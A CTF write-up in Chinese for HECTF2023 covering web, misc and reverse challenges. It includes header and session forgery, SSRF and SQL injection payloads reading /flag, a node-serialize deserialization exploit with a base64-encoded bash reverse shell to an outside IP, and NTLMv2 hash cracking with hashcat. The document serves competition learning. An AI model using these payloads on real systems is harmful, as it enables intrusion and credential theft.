HECTF2023

发表于 更新于 阅读次数:

2023第七届HECTF

Web

伪装者

先XFFX-Forwarded-For: 127.0.0.1

再referer:Referer: ctf.sc0de.com

改UA:User-Agent: Firefox

再session伪造:python3 flask_session_cookie_manager3.py encode -s zxk1ing -t "{'key':'zxk1ing','username':'zxk1ing'}"

image-20231120015919733

再/img?url=file:///flag

image-20231120020023431

EZweb

image-20231120020200720

先XFF:X-Forwarded-For: 127.1.1.1

post传参sort,有sql注入,ban了很多字符select,sleep之类的,但是用大写能绕过,直接读文件

sort=a' union Select load_file('/flag'),2,3 -- -

image-20231120020638549

EZjs

"undefsafe": "2.0.1”

"node-serialize": "0.0.4"

undefsafe有原型链污染,node-serialize可以利用JavaScript的IIFE反序列化进行rce

app.route('/excite')
    .get(function (req, res) {
        let commands = {
            "less1": "Error",
            "less2": "Correct"
        };

        for (let index in commands) {
            console.log(commands[index])
            if(black2(commands[index])){
                try{
                    serialize.unserialize(commands[index]);
                }catch (e){
                    continue;
                }

            }}
        res.send("ok");
        res.end();
    })

excite路由有反序列化,会遍历commands对象的值来反序列化,所以,要污染这个对象的值来达到rce的目的

ban了很多字符,使用eval跟base64的rce

var serialize = require('node-serialize');
var chybeta = {
	vuln : function(){eval(Buffer.from(`Z2xvYmFsLnByb2Nlc3MubWFpbk1vZHVsZS5jb25zdHJ1Y3Rvci5fbG9hZCgiY2hpbGRfcHJvY2VzcyIpLmV4ZWNTeW5jKCJiYXNoIC1jICdiYXNoIC1pID4mIC9kZXYvdGNwLzEyMC43Ni4xOTQuMjUvNTAwMCAwPiYxJyIp`,`base64`).toString());},
}
//global.process.mainModule.constructor._load("child_process").execSync("bash -c 'bash -i >& /dev/tcp/xxx/5000 0>&1'")
serResult = serialize.serialize(chybeta);
console.log("serialize result:");
console.log(serResult+'\n');
console.log("Direct unserialize:")
serialize.unserialize(serResult);
console.log("\n");
console.log("Use IIFE to PWN it:")
exp = serResult.substr(0,serResult.length-2) + "()" + serResult.substr(-2);
console.log(exp);
//{"vuln":"_$$ND_FUNC$$_function(){eval(Buffer.from(`Z2xvYmFsLnByb2Nlc3MubWFpbk1vZHVsZS5jb25zdHJ1Y3Rvci5fbG9hZCgiY2hpbGRfcHJvY2VzcyIpLmV4ZWNTeW5jKCJiYXNoIC1jICdiYXNoIC1pID4mIC9kZXYvdGNwLzEyMC43Ni4xOTQuMjUvNTAwMCAwPiYxJyIp`,`base64`).toString());}()"}

最后post传参

id=__proto__&name={"vuln":"_$$ND_FUNC$$_function(){eval(Buffer.from(`Z2xvYmFsLnByb2Nlc3MubWFpbk1vZHVsZS5jb25zdHJ1Y3Rvci5fbG9hZCgiY2hpbGRfcHJvY2VzcyIpLmV4ZWNTeW5jKCJiYXNoIC1jICdiYXNoIC1pID4mIC9kZXYvdGNwLzEyMC43Ni4xOTQuMjUvNTAwMCAwPiYxJyIp`,`base64`).toString());}()"}&nickname=jj

再去访问/excite,shell就反弹回来了

MISC

osint

公交上方太永年旗舰店

格林格林豪泰智选酒店

直接定位 河北省邯郸市永年区,

看地图酒店对面有永年太极广场

image-20231120021107611

签到

直接公众号

签退

填问卷

NT?M

看流量是smb2的连接,爆破hash

有一个分组的流是连接成功的,去那个流里面找

image-20231120021757567

找到后拼接,拼接格式为

username::domain:ServerChallenge:NTproofstring:modifiedntlmv2response

结果:

administrator::WIN2008:9a88373dbb4f5e36:4eb74543b9962bb2ca36e938909bb930:0101000000000000d23c83f972f7d9015e866dc6343b804400000000020008004800410043004b000100040044004300040010006800610063006b002e0063006f006d0003001600440043002e006800610063006b002e0063006f006d00050010006800610063006b002e0063006f006d0007000800d23c83f972f7d9010600040002000000080030003000000000000000000000000030000046fc5f0d124bc9b99b5b560c14cd7c7e217f08f22ef5f223679ec2c576230fa30a001000000000000000000000000000000000000900240063006900660073002f003100390032002e003100360038002e00310036002e0031003000000000000000000000000000

hashcat找字典爆破

hashcat.exe -m 5600 crack.txt passwd-keyboard-Top500.txt

image-20231120021937688

md5加密一下就有了

大帝攻占福岛

描述说十个一组,每组递增(注意:密文里面有不可见字符的)

解一下第一组凯撒偏移是1,后面直接上脚本

ciphertext = "zpvepoudbsgcdqwvjgocqg|rxrqo|feviefsyx}szwt|skqfl?NKIZLYZUVfU|jslhyfzmiom"
print(len(ciphertext))
list_1 = []
str1 = ""
for i in range(len(ciphertext)):
    if i%10==0 and i != 0:
        list_1.append(str1)
        str1 = ""
    str1+=ciphertext[i]
list_1.append(str1)
print(list_1)
for j in range(len(list_1)):
    for k in list_1[j]:
        print(chr(ord(k)-j-1),end='')
image-20231120022219553

reverse

Ez_Android

主要在这里

public class a implements View.OnClickListener {
        public a() {
        }

        @Override // android.view.View.OnClickListener
        public void onClick(View view) {
            MainActivity mainActivity;
            String str;
            if (MainActivity.this.H0(String.valueOf(MainActivity.this.E.getText()))) {
                mainActivity = MainActivity.this;
                str = "Congratulations, please wrap your input with HECTF{}.";
            } else {
                mainActivity = MainActivity.this;
                str = "Sorry,try again.";
            }
            Toast.makeText(mainActivity, str, 0).show();
        }
    }

    public void G0() {
        this.G = b.f(H).toCharArray();
    }

    public boolean H0(String str) {
        char[] charArray;
        if (this.G.length == 0 || str.length() != 24) {
            return false;
        }
        char[] cArr = (char[]) this.G.clone();
        int i7 = 14;
        for (char c8 : str.toCharArray()) {
            if (i7 < 0 || i7 >= cArr.length || cArr[i7] == '*') {
                return false;
            }
            switch (c8) {
                case c0.f5281k /* 104 */:
                    i7--;
                    break;
                case 'i':
                default:
                    return false;
                case 'j':
                    i7 += 13;
                    break;
                case 'k':
                    i7 -= 13;
                    break;
                case i.f627t /* 108 */:
                    i7++;
                    break;
            }
        }
        return i7 >= 0 && i7 < cArr.length && cArr[i7] == '#';
    }

要求是输入flag,经过H0()的判断

但是首先要知道G的值,jadx里面看有混淆,直接上jeb+雷电开动调

adb shell am start -D -n "包名"

在jeb中点击要断点的代码,ctrl+B断点

G = ['*', '*', '*', '*', '*', '*', '*', '*', '*', '*', '*', '*', '*', '*', '@', '*', '*', '*', '*', '*', '*', '*', '*', '*', '*', '*', '*', '-', '*', '*', '*', '*', '*', '*', '*', '*', '*', '*', '*', '*', '-', '*', '*', '*', '-', '*', '*', '-', '*', '*', '*', '*', '*', '-', '-', '*', '*', '*', '*', '*', '-', '*', '*', '*', '*', '*', '-', '*', '*', '*', '#', '-', '-', '-', '*', '*', '*', '*', '*', '-', '-', '*', '*', '*', '*', '*', '-', '*', '*', '*', '*', '*', '*', '-', '*', '*', '*', '*', '*', '-', '*', '*', '*', '*', '*', '*', '-', '*', '*', '*', '*', '-', '-', '*', '*', '*', '*', '*', '*', '-', '-', '-', '*', '*', '-', '*', '*', '*', '*', '*', '*', '*', '-', '*', '-', '-', '-', '-', '-', '*', '*', '*', '*', '*', '*', '-', '-', '-', '-', '-', '-', '-', '*', '*', '*', '*', '*', '*', '*', '*', '*', '*', '*', '*', '*', '*', '*', '*', '*'];

再看逻辑,h是-1,j是+13,k是-13,l是+1,不能出现i,24的长度,从@走到#

maze,先输出一下地图

j = 0
s = "**************@************-************-***-**-*****--*****-*****-***#---*****--*****-******-*****-******-****--******---**-*******-*-----******-------*****************";
for i in s:
    print(i,end='')
    j += 1
    if (j == 13):
        print()
        j = 0



#s = "jjjjjljjjlljlllkklkkkhhh"
#print(len(s))